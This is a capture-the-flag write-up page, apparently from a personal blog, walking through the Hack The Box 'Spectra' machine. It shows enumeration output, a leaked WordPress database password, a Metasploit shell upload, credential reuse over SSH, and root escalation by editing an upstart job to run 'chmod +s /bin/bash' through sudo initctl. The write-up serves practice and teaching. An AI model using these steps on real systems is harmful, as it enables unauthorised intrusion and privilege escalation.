
<!doctype html>
<html lang="en" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
      
        <meta name="author" content="triki">
      
      
      <link rel="icon" href="../../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-1.2.3, mkdocs-material-8.0.5">
    
    
      
        <title>2021 05 07 spectra - ikirt.github.io</title>
      
    
    
      <link rel="stylesheet" href="../../assets/stylesheets/main.a617204b.min.css">
      
        
        <link rel="stylesheet" href="../../assets/stylesheets/palette.9204c3b2.min.css">
        
          
          
          <meta name="theme-color" content="#00bdd6">
        
      
    
    
    
      
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,400i,700%7CRoboto+Mono&display=fallback">
        <style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
      
    
    
    <script>__md_scope=new URL("../..",location),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
    
      

    
    
  </head>
  
  
    
    
    
    
    
    <body dir="ltr" data-md-color-scheme="slate" data-md-color-primary="cyan" data-md-color-accent="yellow">
  
    
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
    
      

<header class="md-header" data-md-component="header">
  <nav class="md-header__inner md-grid" aria-label="Header">
    <a href="../.." title="ikirt.github.io" class="md-header__button md-logo" aria-label="ikirt.github.io" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54z"/></svg>

    </a>
    <label class="md-header__button md-icon" for="__drawer">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3V6m0 5h18v2H3v-2m0 5h18v2H3v-2z"/></svg>
    </label>
    <div class="md-header__title" data-md-component="header-title">
      <div class="md-header__ellipsis">
        <div class="md-header__topic">
          <span class="md-ellipsis">
            ikirt.github.io
          </span>
        </div>
        <div class="md-header__topic" data-md-component="header-topic">
          <span class="md-ellipsis">
            
              2021 05 07 spectra
            
          </span>
        </div>
      </div>
    </div>
    
    
    
      <label class="md-header__button md-icon" for="__search">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5z"/></svg>
      </label>
      <div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
      <label class="md-search__icon md-icon" for="__search">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5z"/></svg>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12z"/></svg>
      </label>
      <nav class="md-search__options" aria-label="Search">
        
        <button type="reset" class="md-search__icon md-icon" aria-label="Clear" tabindex="-1">
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12 19 6.41z"/></svg>
        </button>
      </nav>
      
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            Initializing search
          </div>
          <ol class="md-search-result__list"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
    
    
  </nav>
  
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
          
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    


<nav class="md-nav md-nav--primary" aria-label="Navigation" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href="../.." title="ikirt.github.io" class="md-nav__button md-logo" aria-label="ikirt.github.io" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54z"/></svg>

    </a>
    ikirt.github.io
  </label>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
      

  
  
  
    <li class="md-nav__item">
      <a href="../.." class="md-nav__link">
        About
      </a>
    </li>
  

    
      
      
      

  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_2" type="checkbox" id="__nav_2" >
      
      
      
      
        <label class="md-nav__link" for="__nav_2">
          3D
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="3D" data-md-level="1">
        <label class="md-nav__title" for="__nav_2">
          <span class="md-nav__icon md-icon"></span>
          3D
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../3D/2021-04-06-my-haribo/" class="md-nav__link">
        3D printing
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../3D/TMC5160/" class="md-nav__link">
        TMC5160
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../3D/mks-genv14/" class="md-nav__link">
        MKS Gen v1.4
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../3D/skrv14/" class="md-nav__link">
        SKR v1.4 Turbo
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../3D/tmc2209/" class="md-nav__link">
        TMC2209
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

    
      
      
      

  
  
    
  
  
    
    <li class="md-nav__item md-nav__item--active md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_3" type="checkbox" id="__nav_3" checked>
      
      
      
      
        <label class="md-nav__link" for="__nav_3">
          HTB
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="HTB" data-md-level="1">
        <label class="md-nav__title" for="__nav_3">
          <span class="md-nav__icon md-icon"></span>
          HTB
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2019-10-20-postman/" class="md-nav__link">
        2019 10 20 postman
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2019-11-10-traverxec/" class="md-nav__link">
        2019 11 10 traverxec
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2020-03-18-traceback/" class="md-nav__link">
        2020 03 18 traceback
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2020-06-16-htb-oh-my-zsh-theme/" class="md-nav__link">
        2020 06 16 htb oh my zsh theme
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2020-07-12-blunder/" class="md-nav__link">
        2020 07 12 blunder
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2020-07-16-tabby/" class="md-nav__link">
        2020 07 16 tabby
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2020-07-19-admirer/" class="md-nav__link">
        2020 07 19 admirer
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2020-08-05-buff/" class="md-nav__link">
        2020 08 05 buff
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2020-09-10-doctor/" class="md-nav__link">
        2020 09 10 doctor
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2020-09-20-omni/" class="md-nav__link">
        2020 09 20 omni
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2020-12-16-academy/" class="md-nav__link">
        2020 12 16 academy
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2021-03-22-scriptkiddie/" class="md-nav__link">
        2021 03 22 scriptkiddie
      </a>
    </li>
  

            
          
            
              
  
  
    
  
  
    <li class="md-nav__item md-nav__item--active">
      
      <input class="md-nav__toggle md-toggle" data-md-toggle="toc" type="checkbox" id="__toc">
      
      
      
      <a href="./" class="md-nav__link md-nav__link--active">
        2021 05 07 spectra
      </a>
      
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2021-06-20-backdoor/" class="md-nav__link">
        2021 06 20 backdoor
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2021-07-05-bountyhunter/" class="md-nav__link">
        2021 07 05 bountyhunter
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2021-07-20-explore/" class="md-nav__link">
        2021 07 20 explore
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../2021-08-05-previse/" class="md-nav__link">
        2021 08 05 previse
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

    
      
      
      

  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_4" type="checkbox" id="__nav_4" >
      
      
      
      
        <label class="md-nav__link" for="__nav_4">
          Hackerone
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="Hackerone" data-md-level="1">
        <label class="md-nav__title" for="__nav_4">
          <span class="md-nav__icon md-icon"></span>
          Hackerone
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../hackerone/2020-04-08-petshop-pro/" class="md-nav__link">
        PetShop Pro Write-up
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../hackerone/2020-04-08-thermostat/" class="md-nav__link">
        H1 Thermostat Write-up
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

    
      
      
      

  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_5" type="checkbox" id="__nav_5" >
      
      
      
      
        <label class="md-nav__link" for="__nav_5">
          iOS
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="iOS" data-md-level="1">
        <label class="md-nav__title" for="__nav_5">
          <span class="md-nav__icon md-icon"></span>
          iOS
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../iOS/2022-02-11-Ipad2-jailbreak/" class="md-nav__link">
        Ipad 2 Jailbreak
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../iOS/2022-03-12-hackintosh/" class="md-nav__link">
        Hackintosh
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

    
      
      
      

  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_6" type="checkbox" id="__nav_6" >
      
      
      
      
        <label class="md-nav__link" for="__nav_6">
          Mc
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="Mc" data-md-level="1">
        <label class="md-nav__title" for="__nav_6">
          <span class="md-nav__icon md-icon"></span>
          Mc
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../mc/2020-04-19-esp32-presence-ha/" class="md-nav__link">
        ESP32 BLE Room Presence with HomeAssistant
      </a>
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../mc/2022-01-05-NodeMCU_wifi_deauth_detection/" class="md-nav__link">
        Wifi Deauth Dectection with NodeMCU
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
          
          <div class="md-content" data-md-component="content">
            <article class="md-content__inner md-typeset">
              
                

  <h1>2021 05 07 spectra</h1>

<p><img alt="Spectra" src="/images/spectra/logo.png" style="height:377px;width:595px" /></p>
<p>Next box is Spectra, rated easy and the OS is set to Other for this one.</p>
<p>Starting off with the nmap I see several interesting ports open.
<div class="highlight"><pre><span></span><code>PORT     STATE SERVICE REASON         VERSION
<span class="m">22</span>/tcp   open  ssh     syn-ack ttl <span class="m">63</span> OpenSSH <span class="m">8</span>.1 <span class="o">(</span>protocol <span class="m">2</span>.0<span class="o">)</span>
<span class="p">|</span> ssh-hostkey: 
<span class="p">|</span>   <span class="m">4096</span> <span class="m">52</span>:47:de:5c:37:4f:29:0e:8e:1d:88:6e:f9:23:4d:5a <span class="o">(</span>RSA<span class="o">)</span>
<span class="p">|</span>_ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDF1xom8Ljz30NltgYXTRoVI2ymBlBZn849bnFYNKwDgwvW9naxom8pe9mzV+I8pAb5AHeVdok7szaIke7nXINK5GdHw+P529fkRNfmq4V63RUmYNKeAZmfGubCQDwGHP0Gj8S/C1lCMp/9kdNPxDv8aamWTeVCTuqDOwMy0GmEGRyk9gaZjwA2T3kIVD/TjLVu5hkpwdoQHr0JYhJRqLKHqZqdcZY7vqUFuECqcgVZ0Sj52/VnT5lis+N3hZK1MqJW2vlPhdlXhESF2O2Z0gzVtnAMB8yT68pbcRUbl6OI0NC6ucKzSIb6g90vwF1kVlj22GXTcfu0r3tyCFlusJFnuhgAIrTax8eQu5W+vLAAM0pbMizVNOEzd4VtBpLBHunEkzDknUZn3k9X3XP9NsIReMW+T8XiLTSxZuve8EWdaIfXoAeUlj0Tsy2iwYfLk6XaO5xssZgHFvB4QnUvpdt2ybsfTEd1aySikuetak9pl7yECFD8jgqT6ybzG1qsTMsdsJz6o871al1r0Dyd76R0Dr3+dO7AhLJtPszZHJXK3YqCqF/qU6kNIPMTIXdiVEuYQ1JieYzyjN3CivzVUPFnvOu2+dD5kFQSQNqR8kHGRqZXW0oUQsDUh1GQsb+iO8sFMDIAqr1SfAKQEpCPpSFl6H1wtNHW8pJJNwj1FkKNXw<span class="o">==</span>
<span class="m">80</span>/tcp   open  http    syn-ack ttl <span class="m">63</span> nginx <span class="m">1</span>.17.4
<span class="p">|</span> http-methods: 
<span class="p">|</span>_  Supported Methods: GET HEAD
<span class="p">|</span>_http-server-header: nginx/1.17.4
<span class="p">|</span>_http-title: Site doesn<span class="err">&#39;</span>t have a title <span class="o">(</span>text/html<span class="o">)</span>.
<span class="m">3306</span>/tcp open  mysql   syn-ack ttl <span class="m">63</span> MySQL <span class="o">(</span>unauthorized<span class="o">)</span>
</code></pre></div></p>
<p>Right away I want to see what's on the website they are hosting.
<img alt="Spectra-HTTP" src="/images/spectra/spectra-http-ip.png" /></p>
<p>Hovering over the first link I see it redirects me to <strong>http://spectra.htb</strong>, so I add that to my hosts file and click the link and I'm faced with a <strong>wordpress</strong> site.</p>
<p><img alt="Spectra-wordpress" src="/images/spectra/spectra-http-domain-1.png" /></p>
<p>Second link only shows an error trying to connect to a database.</p>
<p><img alt="Spectra-wordpress" src="/images/spectra/spectra-http-domain-2.png" /></p>
<p>BUT, removing the index.html from the URL I am presented with the site folder contents.</p>
<p><img alt="Spectra-wordpress" src="/images/spectra/spectra-http-domain-2-dir-listing.png" /></p>
<p>Looking over the files in the folder I see one that is a backup of the <strong>wp-config.php.save</strong>, opening this page then viewing the source I find something juicy.</p>
<div class="highlight"><pre><span></span><code><span class="o">//</span> <span class="o">**</span> <span class="n">MySQL</span> <span class="k">set</span><span class="n">tings</span> <span class="o">-</span> <span class="n">You</span> <span class="n">can</span> <span class="k">get</span> <span class="n">this</span> <span class="n">info</span> <span class="k">from</span> <span class="n">your</span> <span class="n">web</span> <span class="k">host</span> <span class="o">**</span> <span class="o">//</span>
<span class="cm">/** The name of the database for WordPress */</span>
<span class="n">define</span><span class="p">(</span> <span class="s1">&#39;DB_NAME&#39;</span><span class="p">,</span> <span class="s1">&#39;dev&#39;</span> <span class="p">);</span>

<span class="cm">/** MySQL database username */</span>
<span class="n">define</span><span class="p">(</span> <span class="s1">&#39;DB_USER&#39;</span><span class="p">,</span> <span class="s1">&#39;devtest&#39;</span> <span class="p">);</span>

<span class="cm">/** MySQL database password */</span>
<span class="n">define</span><span class="p">(</span> <span class="s1">&#39;DB_PASSWORD&#39;</span><span class="p">,</span> <span class="s1">&#39;devteam01&#39;</span> <span class="p">);</span>

<span class="cm">/** MySQL hostname */</span>
<span class="n">define</span><span class="p">(</span> <span class="s1">&#39;DB_HOST&#39;</span><span class="p">,</span> <span class="s1">&#39;localhost&#39;</span> <span class="p">);</span>

<span class="cm">/** Database Charset to use in creating database tables. */</span>
<span class="n">define</span><span class="p">(</span> <span class="s1">&#39;DB_CHARSET&#39;</span><span class="p">,</span> <span class="s1">&#39;utf8&#39;</span> <span class="p">);</span>

<span class="cm">/** The Database Collate type. Don&#39;t change this if in doubt. */</span>
<span class="n">define</span><span class="p">(</span> <span class="s1">&#39;DB_COLLATE&#39;</span><span class="p">,</span> <span class="s1">&#39;&#39;</span> <span class="p">);</span>
</code></pre></div>
<p>Taking a step back at what I have here, it looks like I have a Production site and the testing site. The creds I just found are for the testing side. Now to see if I can login to something with this. </p>
<p>Going back to the <strong>Software Issue Tracker</strong> since it's a wordpress site and at the bottom of the site is a login page :)</p>
<p><img alt="Spectra-wordpress" src="/images/spectra/spectra-wordpress-link.png" /></p>
<p>I need a username now... running wpscan to enumerate users for me.</p>
<div class="highlight"><pre><span></span><code><span class="o">[</span>i<span class="o">]</span> User<span class="o">(</span>s<span class="o">)</span> Identified:

<span class="o">[</span>+<span class="o">]</span> administrator
 <span class="p">|</span> Found By: Author Posts - Display Name <span class="o">(</span>Passive Detection<span class="o">)</span>
 <span class="p">|</span> Confirmed By:
 <span class="p">|</span>  Rss Generator <span class="o">(</span>Passive Detection<span class="o">)</span>
 <span class="p">|</span>  Author Id Brute Forcing - Author Pattern <span class="o">(</span>Aggressive Detection<span class="o">)</span>
 <span class="p">|</span>  Login Error Messages <span class="o">(</span>Aggressive Detection<span class="o">)</span>
</code></pre></div>
<p><img alt="Spectra-wordpress" src="/images/spectra/spectra-wordpress-login.png" /></p>
<p><img alt="Spectra-wordpress" src="/images/spectra/spectra-wordpress-logged-in.png" /></p>
<p>wordpress has a well known MSF module for gaining reverse shell when you know the admin cred <strong>unix/webapp/wp_admin_shell_upload</strong></p>
<p>Once connected I need to use python to get a proper shell then run linpeas for quick system enum. </p>
<p>Combing through the results for the current user nginx, I see this box is a <strong>Host is Chromium OS 11.0_pre399094_p20200824-r6 clang version 11.0.0</strong> </p>
<p>This is also found:
<div class="highlight"><pre><span></span><code>Autologin Files

/etc/autologin
total <span class="m">4</span>
-rw-r--r-- <span class="m">1</span> root root <span class="m">19</span> Feb  <span class="m">3</span> <span class="m">16</span>:43 <span class="o">[</span><span class="m">1</span><span class="p">;</span>31mpasswd

/etc/autologin/passwd
-rw-r--r-- <span class="m">1</span> root root <span class="m">19</span> Feb  <span class="m">3</span> <span class="m">16</span>:43 /etc/autologin/passwd
SummerHereWeCome!!
</code></pre></div></p>
<p>Now I try to SSH in an one of the users on the system found by linpeas and this password was successful with user <strong>katie</strong>.</p>
<p><img alt="Spectra-wordpress" src="/images/spectra/spectra-ssh-katie.png" /></p>
<p>Running <strong>sudo -l</strong> quickly shows I can run <strong>/sbin/initctl</strong> which is used to interact with with upstart init daemon to start/stop processes.</p>
<p>The user <strong>katie</strong> appears to have the current groups.
<div class="highlight"><pre><span></span><code><span class="nv">uid</span><span class="o">=</span><span class="m">20156</span><span class="o">(</span>katie<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span><span class="m">20157</span><span class="o">(</span>katie<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span><span class="m">20157</span><span class="o">(</span>katie<span class="o">)</span>,20158<span class="o">(</span>developers<span class="o">)</span>
</code></pre></div></p>
<p>Looking for files owned by the group <strong>developers</strong> yields promosing results.</p>
<div class="highlight"><pre><span></span><code>katie@spectra /etc/init $ find / -type f -group developers <span class="m">2</span>&gt;/dev/null
/etc/init/test6.conf
/etc/init/test7.conf
/etc/init/test3.conf
/etc/init/test4.conf
/etc/init/test.conf
/etc/init/test8.conf
/etc/init/test9.conf
/etc/init/test10.conf
/etc/init/test2.conf
/etc/init/test5.conf
/etc/init/test1.conf
/srv/nodetest.js
</code></pre></div>
<p>So, I can run <strong>/sbin/initctl</strong> as root and I can modify a config file as the user I am logged in with :D</p>
<p>I'm going to modify the <strong>test.conf</strong> file so that when it executes it changes the SUID to /bin/bash so I can run it as user <strong>katie</strong> to gain root shell.</p>
<div class="highlight"><pre><span></span><code>description <span class="s2">&quot;Test node.js server&quot;</span>
author      <span class="s2">&quot;katie&quot;</span>

start on filesystem or runlevel <span class="o">[</span><span class="m">2345</span><span class="o">]</span>
stop on shutdown

script
  chmod +s /bin/bash
end script
</code></pre></div>
<p>Now to run the modified script
<div class="highlight"><pre><span></span><code>katie@spectra /etc/init $ sudo /sbin/initctl start <span class="nb">test</span>
<span class="nb">test</span> start/running, process <span class="m">45811</span>
katie@spectra /etc/init $ /bin/bash -p
bash-4.3# id
<span class="nv">uid</span><span class="o">=</span><span class="m">20156</span><span class="o">(</span>katie<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span><span class="m">20157</span><span class="o">(</span>katie<span class="o">)</span> <span class="nv">euid</span><span class="o">=</span><span class="m">0</span><span class="o">(</span>root<span class="o">)</span> <span class="nv">egid</span><span class="o">=</span><span class="m">0</span><span class="o">(</span>root<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span><span class="m">0</span><span class="o">(</span>root<span class="o">)</span>,20157<span class="o">(</span>katie<span class="o">)</span>,20158<span class="o">(</span>developers<span class="o">)</span>
</code></pre></div></p>
<p>Rooted.</p>

  <hr>
<div class="md-source-file">
  <small>
    
      Last update:
      <span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-date">January 28, 2022</span>
      
    
  </small>
</div>

              
            </article>
          </div>
        </div>
        
      </main>
      
        <footer class="md-footer">
  
    <nav class="md-footer__inner md-grid" aria-label="Footer">
      
        
        <a href="../2021-03-22-scriptkiddie/" class="md-footer__link md-footer__link--prev" aria-label="Previous: 2021 03 22 scriptkiddie" rel="prev">
          <div class="md-footer__button md-icon">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12z"/></svg>
          </div>
          <div class="md-footer__title">
            <div class="md-ellipsis">
              <span class="md-footer__direction">
                Previous
              </span>
              2021 03 22 scriptkiddie
            </div>
          </div>
        </a>
      
      
        
        <a href="../2021-06-20-backdoor/" class="md-footer__link md-footer__link--next" aria-label="Next: 2021 06 20 backdoor" rel="next">
          <div class="md-footer__title">
            <div class="md-ellipsis">
              <span class="md-footer__direction">
                Next
              </span>
              2021 06 20 backdoor
            </div>
          </div>
          <div class="md-footer__button md-icon">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M4 11v2h12l-5.5 5.5 1.42 1.42L19.84 12l-7.92-7.92L10.5 5.5 16 11H4z"/></svg>
          </div>
        </a>
      
    </nav>
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-copyright">
  
  
    Made with
    <a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
      Material for MkDocs
    </a>
  
</div>
      
    </div>
  </div>
</footer>
      
    </div>
    <div class="md-dialog" data-md-component="dialog">
      <div class="md-dialog__inner md-typeset"></div>
    </div>
    <script id="__config" type="application/json">{"base": "../..", "features": ["content.code.annotate"], "translations": {"clipboard.copy": "Copy to clipboard", "clipboard.copied": "Copied to clipboard", "search.config.lang": "en", "search.config.pipeline": "trimmer, stopWordFilter", "search.config.separator": "[\\s\\-]+", "search.placeholder": "Search", "search.result.placeholder": "Type to start searching", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.term.missing": "Missing", "select.version.title": "Select version"}, "search": "../../assets/javascripts/workers/search.cefbb252.min.js"}</script>
    
    
      <script src="../../assets/javascripts/bundle.a5f8ea78.min.js"></script>
      
    
  </body>
</html>